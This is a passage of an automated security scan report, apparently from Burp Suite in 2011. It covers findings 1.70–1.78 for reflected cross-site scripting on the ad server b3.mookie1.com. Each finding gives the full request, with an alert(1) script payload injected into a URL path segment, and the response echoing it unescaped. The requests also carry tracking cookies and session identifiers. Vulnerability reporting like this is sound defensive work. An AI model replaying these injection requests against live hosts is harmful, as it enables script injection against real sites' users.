Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_160_TOP&groupid=1123043650&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; Dell=CentroB3; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; id=3375925924; session=1299459588|1299459588

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:44:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 368
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5345525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MaxpointB37c414"><script>alert(1)</script>a626a591c0b/Dell/Streak11Q1/Demo/160/1[timestamp]/1428506559/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.70. http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cda3b"><script>alert(1)</script>ce7cb4a1b8e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/MaxpointB3/Dellcda3b"><script>alert(1)</script>ce7cb4a1b8e/Streak11Q1/Demo/160/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_160_TOP&groupid=1123043650&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; Dell=CentroB3; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; id=3375925924; session=1299459588|1299459588

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:44:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 368
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MaxpointB3/Dellcda3b"><script>alert(1)</script>ce7cb4a1b8e/Streak11Q1/Demo/160/1[timestamp]/1949019059/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.71. http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7029"><script>alert(1)</script>96491854817 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/MaxpointB3/Dell/Streak11Q1d7029"><script>alert(1)</script>96491854817/Demo/160/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_160_TOP&groupid=1123043650&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; Dell=CentroB3; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; id=3375925924; session=1299459588|1299459588

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:45:00 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 368
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MaxpointB3/Dell/Streak11Q1d7029"><script>alert(1)</script>96491854817/Demo/160/1[timestamp]/1704165406/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.72. http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7299"><script>alert(1)</script>2cab2f1c0af was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/MaxpointB3/Dell/Streak11Q1/Demoa7299"><script>alert(1)</script>2cab2f1c0af/160/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_160_TOP&groupid=1123043650&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; Dell=CentroB3; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; id=3375925924; session=1299459588|1299459588

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:45:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 367
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MaxpointB3/Dell/Streak11Q1/Demoa7299"><script>alert(1)</script>2cab2f1c0af/160/1[timestamp]/918491308/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.73. http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aff3e"><script>alert(1)</script>8f270842d1b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/MaxpointB3/Dell/Streak11Q1/Demo/160aff3e"><script>alert(1)</script>8f270842d1b/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_160_TOP&groupid=1123043650&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; Dell=CentroB3; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; id=3375925924; session=1299459588|1299459588

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:45:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 367
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MaxpointB3/Dell/Streak11Q1/Demo/160aff3e"><script>alert(1)</script>8f270842d1b/1[timestamp]/275945251/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.74. http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a8c1"><script>alert(1)</script>73fad9bf007 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x904a8c1"><script>alert(1)</script>73fad9bf007 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_160_TOP&groupid=1123043650&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; Dell=CentroB3; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; id=3375925924; session=1299459588|1299459588

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:46:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]/537082571/x904a8c1"><script>alert(1)</script>73fad9bf007/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.75. http://b3.mookie1.com/2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8113"><script>alert(1)</script>008009ecf9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTraderB3a8113"><script>alert(1)</script>008009ecf9f/NatureMade/Geo_2011Q1/P/300/11299524221@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=cD0K16Nw3T9xPQrXo3DdPwAAAGBmZgpAAAAAAAAA-D8AAAAAAAD4P6eF4PSsMN9uvNv2i6g_Cj59KnVNAAAAACQhAAC1AAAAbAEAAAIAAACIpgMA0WMAAAEAAABVU0QAVVNEANgCWgC7CksACwkBAgUCAAQAAAAARh5UowAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBI74ifSp1TbKFA6j0lAfSpKHkBcDG1PcB-Lifjxu4sOrvRAAQARgBIAA4AVCAx-HEBGDJ5vaGyKOgGYIBF2NhLXB1Yi05NjY0MzE5MDQ3OTY2MjA5sgEOd3d3LnVzdHJlYW0udHa6AQk3Mjh4OTBfYXPIAQnaARZodHRwOi8vd3d3LnVzdHJlYW0udHYvmALMA8ACBMgCqKikGagDAegD1wHoA_8G9QMAAAAE%26num%3D1%26sig%3DAGiWqtwJs6tDGaLYYr3OCiYNrgO6i_a7pA%26client%3Dca-pub-9664319047966209%26adurl%3D&tt_code=vert-215&udj=uf%28%27a%27%2C+7924%2C+1299524221%29%3Buf%28%27c%27%2C+55684%2C+1299524221%29%3Buf%28%27g%27%2C+24486%2C+1299524221%29%3Buf%28%27r%27%2C+239240%2C+1299524221%29%3B&cnd=!nwpvFwiEswMQiM0OGAAg0ccBKEsxAAAAAAAA-D9CCggAEAAYACABKAFIAVAAWLsVYABo7AI.&referrer=http://www.ustream.tv/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; Dell=MaxpointB3; id=3375925924

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 18:59:01 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderB3a8113"><script>alert(1)</script>008009ecf9f/NatureMade/Geo_2011Q1/P/300/1294024764/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.76. http://b3.mookie1.com/2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9442e"><script>alert(1)</script>caf55ec555b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTraderB3/NatureMade9442e"><script>alert(1)</script>caf55ec555b/Geo_2011Q1/P/300/11299524221@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=cD0K16Nw3T9xPQrXo3DdPwAAAGBmZgpAAAAAAAAA-D8AAAAAAAD4P6eF4PSsMN9uvNv2i6g_Cj59KnVNAAAAACQhAAC1AAAAbAEAAAIAAACIpgMA0WMAAAEAAABVU0QAVVNEANgCWgC7CksACwkBAgUCAAQAAAAARh5UowAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBI74ifSp1TbKFA6j0lAfSpKHkBcDG1PcB-Lifjxu4sOrvRAAQARgBIAA4AVCAx-HEBGDJ5vaGyKOgGYIBF2NhLXB1Yi05NjY0MzE5MDQ3OTY2MjA5sgEOd3d3LnVzdHJlYW0udHa6AQk3Mjh4OTBfYXPIAQnaARZodHRwOi8vd3d3LnVzdHJlYW0udHYvmALMA8ACBMgCqKikGagDAegD1wHoA_8G9QMAAAAE%26num%3D1%26sig%3DAGiWqtwJs6tDGaLYYr3OCiYNrgO6i_a7pA%26client%3Dca-pub-9664319047966209%26adurl%3D&tt_code=vert-215&udj=uf%28%27a%27%2C+7924%2C+1299524221%29%3Buf%28%27c%27%2C+55684%2C+1299524221%29%3Buf%28%27g%27%2C+24486%2C+1299524221%29%3Buf%28%27r%27%2C+239240%2C+1299524221%29%3B&cnd=!nwpvFwiEswMQiM0OGAAg0ccBKEsxAAAAAAAA-D9CCggAEAAYACABKAFIAVAAWLsVYABo7AI.&referrer=http://www.ustream.tv/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; Dell=MaxpointB3; id=3375925924

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 18:59:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderB3/NatureMade9442e"><script>alert(1)</script>caf55ec555b/Geo_2011Q1/P/300/1571540665/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.77. http://b3.mookie1.com/2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7deab"><script>alert(1)</script>3c3c43fbf6d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTraderB3/NatureMade/Geo_2011Q17deab"><script>alert(1)</script>3c3c43fbf6d/P/300/11299524221@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=cD0K16Nw3T9xPQrXo3DdPwAAAGBmZgpAAAAAAAAA-D8AAAAAAAD4P6eF4PSsMN9uvNv2i6g_Cj59KnVNAAAAACQhAAC1AAAAbAEAAAIAAACIpgMA0WMAAAEAAABVU0QAVVNEANgCWgC7CksACwkBAgUCAAQAAAAARh5UowAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBI74ifSp1TbKFA6j0lAfSpKHkBcDG1PcB-Lifjxu4sOrvRAAQARgBIAA4AVCAx-HEBGDJ5vaGyKOgGYIBF2NhLXB1Yi05NjY0MzE5MDQ3OTY2MjA5sgEOd3d3LnVzdHJlYW0udHa6AQk3Mjh4OTBfYXPIAQnaARZodHRwOi8vd3d3LnVzdHJlYW0udHYvmALMA8ACBMgCqKikGagDAegD1wHoA_8G9QMAAAAE%26num%3D1%26sig%3DAGiWqtwJs6tDGaLYYr3OCiYNrgO6i_a7pA%26client%3Dca-pub-9664319047966209%26adurl%3D&tt_code=vert-215&udj=uf%28%27a%27%2C+7924%2C+1299524221%29%3Buf%28%27c%27%2C+55684%2C+1299524221%29%3Buf%28%27g%27%2C+24486%2C+1299524221%29%3Buf%28%27r%27%2C+239240%2C+1299524221%29%3B&cnd=!nwpvFwiEswMQiM0OGAAg0ccBKEsxAAAAAAAA-D9CCggAEAAYACABKAFIAVAAWLsVYABo7AI.&referrer=http://www.ustream.tv/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; Dell=MaxpointB3; id=3375925924

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 18:59:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5345525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderB3/NatureMade/Geo_2011Q17deab"><script>alert(1)</script>3c3c43fbf6d/P/300/1954665045/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.78. http://b3.mookie1.com/2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7c76"><script>alert(1)</script>3397761bfb1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTraderB3/NatureMade/Geo_2011Q1/Pb7c76"><script>alert(1)</script>3397761bfb1/300/11299524221@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=cD0K16Nw3T9xPQrXo3DdPwAAAGBmZgpAAAAAAAAA-D8AAAAAAAD4P6eF4PSsMN9uvNv2i6g_Cj59KnVNAAAAACQhAAC1AAAAbAEAAAIAAACIpgMA0WMAAAEAAABVU0QAVVNEANgCWgC7CksACwkBAgUCAAQAAAAARh5UowAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBI74ifSp1TbKFA6j0lAfSpKHkBcDG1PcB-Lifjxu4sOrvRAAQARgBIAA4AVCAx-HEBGDJ5vaGyKOgGYIBF2NhLXB1Yi05NjY0MzE5MDQ3OTY2MjA5sgEOd3d3LnVzdHJlYW0udHa6AQk3Mjh4OTBfYXPIAQnaARZodHRwOi8vd3d3LnVzdHJlYW0udHYvmALMA8ACBMgCqKikGagDAegD1wHoA_8G9QMAAAAE%26num%3D1%26sig%3DAGiWqtwJs6tDGaLYYr3OCiYNrgO6i_a7pA%26client%3Dca-pub-9664319047966209%26adurl%3D&tt_code=vert-215&udj=uf%28%27a%27%2C+7924%2C+1299524221%29%3Buf%28%27c%27%2C+55684%2C+1299524221%29%3Buf%28%27g%27%2C+24486%2C+1299524221%29%3Buf%28%27r%27%2C+239240%2C+1299524221%29%3B&cnd=!nwpvFwiEswMQiM0OGAAg0ccBKEsxAAAAAAAA-D9CCggAEAAYACABKAFIAVAAWLsVYABo7AI.&referrer=http://www.ustream.tv/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; Dell=MaxpointB3; id=3375925924

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 18:59:17 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderB3/NatureMade/Geo_2011Q1/Pb7c76"><script>alert(1)</script>3397761bfb1/300/1782998593/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

